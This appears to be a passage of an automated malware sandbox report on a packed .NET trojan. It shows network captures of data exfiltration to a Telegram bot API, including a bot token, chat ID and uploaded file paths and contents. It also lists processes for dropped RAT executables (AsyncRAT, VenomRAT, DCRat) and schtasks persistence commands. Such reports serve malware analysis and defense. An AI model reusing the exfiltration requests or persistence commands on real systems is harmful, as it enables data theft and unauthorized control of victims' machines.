2024-05-23 13:36:33 UTC	4096	OUT	Data Raw: 30 0c 83 12 a0 84 80 66 10 c3 38 76 fc 65 9d 92 80 cb b8 1d d3 4d cb ab 14 5c 3f 48 d8 09 c3 b4 29 d5 29 d3 08 63 9a e2 34 a8 d8 a6 7e c7 ab 5f 61 27 da 2a fe 24 e7 82 90 b0 86 7e b5 55 58 88 3b e0 00 00 20 00 49 44 41 54 94 b1 30 2e 19 63 a0 14 a1 97 9a 84 10 82 ba d5 bf e1 a7 e1 a1 87 51 a0 06 41 10 c5 6a f8 1a 8f a6 57 a3 b3 e1 f0 cd e8 f5 00 eb 28 2d 3a 42 00 14 10 00 4a c3 63 53 c3 37 c1 84 d2 6a b8 56 57 10 01 28 25 95 ca 57 7c db b2 79 10 f8 7e c0 b9 00 a5 40 aa 4a 31 37 31 36 d0 7f be ff f8 c9 b3 a6 6d 25 62 76 f7 9a de e4 9a 8d 76 22 ad 6b 7a 29 5f a8 14 26 25 e7 7a 2c ae c7 e2 4c 63 84 91 75 ab bb 13 f1 a4 72 fd 8a cf 6b 7b ef aa cf a6 aa c3 bc 04 08 09 67 72 c3 55 c1 f8 27 00 a1 48 c3 c4 2a 63 2c ac a9 a4 eb ba a6 69 ba ae 87 1f 44 c7 37 45 e5 Data Ascii: 0f8veM\?H))c4~_a'$~UX; IDAT0.cQAjW(-:BJcS7jVW(%W\|y~@J1716m%bvv"kz)_&%z,Lcurk{grU'Hc,iD7E
2024-05-23 13:36:33 UTC	4096	OUT	Data Raw: 25 dd ee 2c 0d 0d 07 be 2f 85 f0 5d e9 2a 6f fd d6 de 80 97 b9 9f d3 f4 f8 3d af 79 ed 9e 1b b6 4d db c2 fa 40 8d 86 7c b1 93 8a 10 42 33 84 63 bf 8b 8d d4 15 d4 76 27 c6 bc 72 79 ea 20 30 00 6c df dc f7 c6 bb 5e 15 8f 59 c3 c5 92 6e d0 78 7b a6 52 70 ee 7c d5 56 0e c6 fe e7 8e 8d 57 54 45 4f f4 66 93 09 53 93 00 f9 c9 dc d9 fe 81 17 cf 97 ca 22 a9 31 d5 93 69 ff 2f bf fe d3 4f 3e 73 3c bd ca ee 3f d5 3f 74 6e 58 d3 8c 75 1b bb ef ba f5 d6 5f 79 fb db d7 f5 4c b3 61 31 5c 94 84 81 8a d0 12 82 63 bf cb 10 66 ea a2 aa 16 d7 0d 0f 01 a7 94 10 c2 2b 65 a7 98 b7 d2 19 32 65 94 55 d7 b4 cd eb d7 bd 76 cf 4d 6b 7a ba dc c0 c9 97 bc 93 a7 47 2e f4 0f 33 0d 3c c7 95 2c 36 ce e9 86 ac 4d 85 3f 3e 3e 71 ee c2 f0 a9 09 dd 4e 77 15 72 39 3b 6e af ef 6d 1f f3 dc 73 a7 Data Ascii: %,/]*o=yM@\|B3cv'ry 0l^Ynx{Rp\|VWTEOfS"1i/O>s<??tnXu_yLa1\cf+e2eUvMkzG.3<,6M?>>qNwr9;nms
2024-05-23 13:36:33 UTC	4096	OUT	Data Raw: 20 75 c2 91 1c 8c 55 c0 4c 45 2b 58 32 d1 58 dd ed e5 b3 4e a9 2c ae f9 c0 cd 7d 76 53 06 8d 11 82 da c0 6f 58 16 5f d3 b4 2b 15 75 2a 9f 39 3d b9 ff 69 80 cb 8b 35 10 50 52 7c eb c9 a7 be fe f8 8f 15 25 87 2f 0c 38 9e ab 96 24 d0 9f 00 00 20 00 49 44 41 54 e9 ba ae e9 be eb 3a 95 92 1d 8b 53 ea 0b 21 98 a6 09 2e da da db a5 94 e5 52 49 08 01 4a 05 41 c0 18 23 84 b8 ae 63 d3 78 aa ad ad 54 2c 02 21 52 08 1e 04 41 e0 1f f2 bd 73 df 1c f1 85 b8 7d e7 8e 4d 3d bd 96 6e 44 3b 73 72 cf 3f e3 e7 26 32 af 7c cd d4 a6 26 bb 7b fd 72 d1 1b 19 0a 4f 37 a7 52 12 1c fe ad c1 4c 45 2b 96 92 1e 80 19 7d fa f2 59 e7 dd bf 7b 72 26 0f dc d4 67 fd dd 67 b7 2e 58 bb d0 f5 a2 be 93 1a 15 f2 9d f6 9e b5 40 8d d6 1f 85 ff 28 00 a0 94 5c 18 1d 5d db 99 7d fc c4 cb 61 a0 72 3f Data Ascii: uULE+X2XN,}vSoX_+u*9=i5PR\|%/8$ IDAT:S!.RIJA#cxT,!RAs}M=nD;sr?&2\|&{rO7RLE+}Y{r&gg.X@(\]}ar?
2024-05-23 13:36:33 UTC	4096	OUT	Data Raw: a5 99 ba 21 8a 35 2d cc b5 96 96 96 ce 3e 69 8c 81 8d d5 db 17 2f 5e ed 0e 47 73 4b 0b a7 1e 7e b8 5a e1 ae 57 bf d1 8d 14 b2 4d 65 7f e5 fc 6a 77 6b d3 f7 03 8b d1 91 a6 db f6 e3 6e b4 db 50 95 4a 3f 71 fa 64 32 92 dc 2f 9d de cb 2d ea 42 33 ba 68 63 6d 17 a7 02 80 5d 6f 9a 78 74 60 45 bf 50 72 ea 9d b1 97 50 63 29 c1 71 66 1f 7c ec 2e cb 38 ac c4 bd 4d 15 44 a0 89 08 71 bc 1f c5 9c 36 0b bd 28 92 12 da 00 48 80 08 99 ce af e0 18 4e 02 1b 45 bb 36 e7 60 00 50 64 ae c5 dd eb 71 77 41 d4 8e d9 cd bb 61 d6 a9 a9 a9 c1 60 50 8c 38 c2 1b b7 56 bf e7 90 e8 78 a1 24 d4 12 ef 00 12 3b 75 62 17 1a e5 0f 93 b9 8e a9 e0 31 99 62 d9 e6 3a 59 03 32 d2 ca 26 36 9e be e7 d8 7c b3 f1 f9 1f f8 d4 6f 7f fd 79 6e f3 69 9b 59 b6 90 86 2a 96 55 ab 5a 53 8d 06 43 ea 6d 77 87 Data Ascii: !5->i/^GsK~ZWMejwknPJ?qd2/-B3hcm]oxt`EPrPc)qf\|.8MDq6(HNE6`PdqwAa`P8Vx$;ub1b:Y2&6\|oyniY*UZSCmw
2024-05-23 13:36:33 UTC	4096	OUT	Data Raw: a8 4c b0 61 4d b5 76 5d bb 51 ca c4 31 73 dd 83 bc 3e 1c 68 4e dd 6b a4 56 16 0e ef 27 4d 52 64 ae c7 dd 62 58 a3 88 62 86 57 9e 54 33 96 07 65 8a a5 bc 4c af 21 1a 45 51 ef e6 1a 19 a5 42 ff 47 be ef d9 84 50 91 73 e0 02 11 01 05 80 04 44 50 92 c8 30 ce 19 f8 e5 f3 7e 00 00 20 00 49 44 41 54 e3 96 10 a4 44 a3 d9 7c f6 89 33 1b fd d1 57 5f ba b2 30 57 53 52 5a 60 5e fd fd af 3c f0 f4 87 6c 21 10 11 92 4a c1 e9 35 8e 83 31 bb 94 f3 45 3f ce f5 b0 bb 20 6a fb 79 80 3d cf 1b 0c 06 9c 73 ce 79 19 55 2d 51 62 22 f2 0d 74 12 28 89 e3 78 6f c7 37 f7 c8 3d e1 cd 15 84 24 2f a5 e8 72 4d 90 3b b6 76 31 19 0b 2a 8b 34 3d b7 0e bf 35 d5 b8 44 50 e7 c8 19 90 c5 d1 ab 8a 76 bb 73 fc d0 a1 57 af 5c e9 0d ae bc 62 a1 cb 21 8a a5 34 34 1c 85 a1 d4 ca 84 86 c8 ca 64 53 7f Data Ascii: LaMv]Q1s>hNkV'MRdbXbWT3eL!EQBGPsDP0~ IDATD\|3W_0WSRZ`^<l!J51E? jy=syU-Qb"t(xo7=$/rM;v1*4=5DPvsW\b!44dS
2024-05-23 13:36:33 UTC	4096	OUT	Data Raw: 6c 40 8e 5a 99 51 00 52 f5 37 6f 07 fd cd c5 13 f7 4f 6b 1d 86 61 67 73 55 c7 a3 cf fd d8 27 3d db b6 2c 11 47 51 af 7d bb bf bd 6e 09 cb 0f 06 83 e1 20 f0 03 a5 14 11 55 2a ae b0 84 d1 9a 01 51 1c fb be 5f 6b 36 12 0e cf 14 f8 f9 78 12 75 15 19 da 45 f9 69 a7 a7 dc e3 d3 93 13 b6 d5 09 38 e7 45 df 6f bf df 7f e9 a5 97 fa fd fe 7e c7 97 28 f1 2e a2 dd 6e 5f bd 7a b5 d5 6a 9d 3d 7b d6 b2 26 84 33 de 21 24 ab 44 52 50 29 a1 d5 7e bf bf 57 ac 04 00 73 ad ea aa ec c7 b1 de b1 5c 30 48 8b 04 52 ba ff 45 00 2e d0 a4 9c 48 26 a9 43 9a d0 62 46 b1 88 24 6c 44 21 00 92 a6 e8 89 e2 81 41 4e ae 0c c9 24 25 07 11 18 00 70 30 04 80 69 f8 0a 00 49 13 30 00 04 26 00 41 34 ed d6 47 8e 4f bc c0 ee f5 ab 4c 6b cb 29 23 a9 3b 70 10 39 35 2f a2 44 40 76 63 df 60 6a 60 e2 9d Data Ascii: l@ZQR7oOkagsU'=,GQ}n U*Q_k6xuEi8Eo~(.n_zj={&3!$DRP)~Ws\0HRE.H&CbF$lD!AN$%p0iI0&A4GOLk)#;p95/D@vc`j`
2024-05-23 13:36:33 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:33 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
265	192.168.2.5	61321	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:33 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 347 Expect: 100-continue
2024-05-23 13:36:33 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:33 UTC	347	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 36 34 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 44 6f 63 75 6d 65 6e 74 73 2b 61 6e 64 2b 53 65 74 74 69 6e 67 73 25 35 43 61 6c 66 6f 6e 73 25 35 43 41 70 70 44 61 74 61 25 35 43 4c 6f 63 61 6c 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 41 70 70 6c 69 63 61 74 69 6f 6e 2b 44 61 74 61 25 35 43 47 6f 6f 67 6c 65 25 35 43 43 68 72 6f 6d 65 25 35 43 55 73 65 72 2b 44 61 74 61 25 35 43 44 65 66 61 75 6c 74 25 35 43 57 65 62 2b 41 70 70 6c 69 63 61 74 Data Ascii: chat_id=1655240967&text=File%3A+64.png%0APath%3A+C%3A%5CDocuments+and+Settings%5Cuser%5CAppData%5CLocal%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CApplication+Data%5CGoogle%5CChrome%5CUser+Data%5CDefault%5CWeb+Applicat
2024-05-23 13:36:33 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:33 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
266	192.168.2.5	61322	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:33 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 196 Expect: 100-continue
2024-05-23 13:36:33 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:33 UTC	196	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 43 6c 6f 73 65 32 78 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 73 74 61 74 69 63 25 35 43 69 6d 61 67 65 73 25 35 43 74 68 65 6d 65 73 25 35 43 64 61 72 6b 25 35 43 43 6c 6f 73 65 32 78 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 35 36 37 2b 42 Data Ascii: chat_id=1655240967&text=File%3A+Close2x.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Cstatic%5Cimages%5Cthemes%5Cdark%5CClose2x.png%0ASize%3A+567+B
2024-05-23 13:36:34 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:34 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
267	192.168.2.5	61323	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:34 UTC	196	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendMessage HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: api.telegram.org Content-Length: 258 Expect: 100-continue
2024-05-23 13:36:34 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:34 UTC	258	OUT	Data Raw: 63 68 61 74 5f 69 64 3d 31 36 35 35 32 34 30 39 36 37 26 74 65 78 74 3d 46 69 6c 65 25 33 41 2b 64 63 33 62 35 64 34 34 39 34 34 39 61 35 31 30 33 66 39 30 31 38 39 62 32 33 39 63 30 62 66 36 2e 70 6e 67 25 30 41 50 61 74 68 25 33 41 2b 43 25 33 41 25 35 43 50 72 6f 67 72 61 6d 2b 46 69 6c 65 73 25 35 43 41 64 6f 62 65 25 35 43 41 63 72 6f 62 61 74 2b 44 43 25 35 43 41 63 72 6f 62 61 74 25 35 43 57 65 62 52 65 73 6f 75 72 63 65 73 25 35 43 52 65 73 6f 75 72 63 65 30 25 35 43 61 70 70 31 25 35 43 64 63 2d 64 65 73 6b 74 6f 70 2d 61 70 70 2d 64 72 6f 70 69 6e 25 35 43 31 2e 30 2e 30 5f 31 2e 30 2e 30 25 35 43 64 63 33 62 35 64 34 34 39 34 34 39 61 35 31 30 33 66 39 30 31 38 39 62 32 33 39 63 30 62 66 36 2e 70 6e 67 25 30 41 53 69 7a 65 25 33 41 2b 31 30 37 Data Ascii: chat_id=1655240967&text=File%3A+dc3b5d449449a5103f90189b239c0bf6.png%0APath%3A+C%3A%5CProgram+Files%5CAdobe%5CAcrobat+DC%5CAcrobat%5CWebResources%5CResource0%5Capp1%5Cdc-desktop-app-dropin%5C1.0.0_1.0.0%5Cdc3b5d449449a5103f90189b239c0bf6.png%0ASize%3A+107
2024-05-23 13:36:34 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:34 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
268	192.168.2.5	61324	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:34 UTC	233	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="1f289f73-e1c8-4805-a304-af7c9691fe3d" Host: api.telegram.org Content-Length: 1548 Expect: 100-continue
2024-05-23 13:36:34 UTC	25	IN	HTTP/1.1 100 Continue
2024-05-23 13:36:34 UTC	40	OUT	Data Raw: 2d 2d 31 66 32 38 39 66 37 33 2d 65 31 63 38 2d 34 38 30 35 2d 61 33 30 34 2d 61 66 37 63 39 36 39 31 66 65 33 64 0d 0a Data Ascii: --1f289f73-e1c8-4805-a304-af7c9691fe3d
2024-05-23 13:36:34 UTC	91	OUT	Data Raw: 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 64 6f 63 75 6d 65 6e 74 3b 20 66 69 6c 65 6e 61 6d 65 3d 36 34 2e 70 6e 67 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 36 34 2e 70 6e 67 0d 0a 0d 0a Data Ascii: Content-Disposition: form-data; name=document; filename=64.png; filename*=utf-8''64.png
2024-05-23 13:36:34 UTC	1232	OUT	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 40 00 00 00 40 08 06 00 00 00 aa 69 71 de 00 00 04 97 49 44 41 54 78 9c ed 5b 4d 8b 5c 45 14 3d e7 d5 eb af 99 49 86 c1 c5 64 70 e3 42 14 13 24 f8 07 66 e3 da 95 74 10 57 a2 92 85 7f 40 c8 a0 34 ea c4 b5 0b 05 43 70 a7 8b b4 ee 45 0d 08 22 18 45 71 02 11 23 2e c4 8d 19 45 12 3b f3 d9 fd aa 8e 8b ea 37 13 87 4c cf eb a6 aa fb 8d e9 03 af 7b d3 ef d6 bd a7 6e dd 3a d5 dc 22 46 41 4b 09 6e 80 cd e6 48 6f 17 42 bb 0d a0 4d 1b 6f 84 91 21 fe 9f c6 4a 87 7f 85 5a 7e f3 ee 13 86 7a cc 81 55 26 46 89 b3 c1 1c 75 82 2a b5 06 3b 9d bf ff b9 f6 16 3f f3 24 50 a1 ec 1f c4 50 04 9c 6e fd 39 77 aa 3a f7 1e 92 e4 b9 c4 d4 2a 95 24 bc 43 12 60 0c 80 da 3c 16 5e fc 7e e5 f6 07 bc 88 e6 15 83 f6 b9 28 cb a1 20 01 7e Data Ascii: PNGIHDR@@iqIDATx[M\E=IdpB$ftW@4CpE"Eq#.E;7L{n:"FAKnHoBMo!JZ~zU&Fu;?$PPn9w:$C`<^~( ~
2024-05-23 13:36:34 UTC	131	OUT	Data Raw: 0d 0a 2d 2d 31 66 32 38 39 66 37 33 2d 65 31 63 38 2d 34 38 30 35 2d 61 33 30 34 2d 61 66 37 63 39 36 39 31 66 65 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 63 68 61 74 5f 69 64 0d 0a 0d 0a Data Ascii: --1f289f73-e1c8-4805-a304-af7c9691fe3dContent-Type: text/plain; charset=utf-8Content-Disposition: form-data; name=chat_id
2024-05-23 13:36:34 UTC	10	OUT	Data Raw: 31 36 35 35 32 34 30 39 36 37 Data Ascii: 1655240967
2024-05-23 13:36:34 UTC	44	OUT	Data Raw: 0d 0a 2d 2d 31 66 32 38 39 66 37 33 2d 65 31 63 38 2d 34 38 30 35 2d 61 33 30 34 2d 61 66 37 63 39 36 39 31 66 65 33 64 2d 2d 0d 0a Data Ascii: --1f289f73-e1c8-4805-a304-af7c9691fe3d--
2024-05-23 13:36:35 UTC	405	IN	HTTP/1.1 401 Unauthorized Server: nginx/1.18.0 Date: Thu, 23 May 2024 13:36:34 GMT Content-Type: application/json Content-Length: 58 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":401,"description":"Unauthorized"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
269	192.168.2.5	61325	149.154.167.220	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 13:36:34 UTC	232	OUT	POST /bot7083561074:AAHj8pmfGJydmFs_fzEtFsbnz2QMB7-3bwY/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary="d80e067b-6bdb-4762-b126-95d60933b193" Host: api.telegram.org Content-Length: 893 Expect: 100-continue
2024-05-23 13:36:35 UTC	25	IN	HTTP/1.1 100 Continue

Target ID:	0
Start time:	09:33:52
Start date:	23/05/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe"
Imagebase:	0x680000
File size:	236'544 bytes
MD5 hash:	144F1B1C4B9CDAD97D8DD1A3A89E7EA1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:33:53
Start date:	23/05/2024
Path:	C:\Users\user\AppData\Local\Temp\Client.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\Client.exe"
Imagebase:	0x350000
File size:	75'776 bytes
MD5 hash:	7AC0ADF482250172280DEFEC7A7054DA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Client.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\Client.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:33:53
Start date:	23/05/2024
Path:	C:\Users\user\AppData\Local\Temp\Infected.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\Infected.exe"
Imagebase:	0x30000
File size:	64'512 bytes
MD5 hash:	B8D455465260A845DB35492FDA5A8888
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000003.00000002.2032453597.0000000002301000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000003.00000002.2031490283.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Infected.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\Infected.exe, Author: ditekSHen Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: C:\Users\user\AppData\Local\Temp\Infected.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 76%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:33:53
Start date:	23/05/2024
Path:	C:\Users\user\AppData\Local\Temp\WinDefend.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\WinDefend.exe"
Imagebase:	0xbe0000
File size:	89'088 bytes
MD5 hash:	5FC6A541845FDAFB597DDFB98FA28B54
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 74%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	09:33:56
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"' & exit
Imagebase:	0x7ff6d64d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:33:56
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:33:56
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Loader" /tr '"C:\Users\user\AppData\Roaming\Loader.exe"' & exit
Imagebase:	0x7ff77add0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	09:33:56
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat""
Imagebase:	0x7ff77add0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:33:56
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:33:56
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF879.tmp.bat""
Imagebase:	0x7ff77add0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:33:56
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:33:56
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	09:33:56
Start date:	23/05/2024
Path:	C:\Windows\System32\timeout.exe
Wow64 process (32bit):	false
Commandline:	timeout 3
Imagebase:	0x7ff71d750000
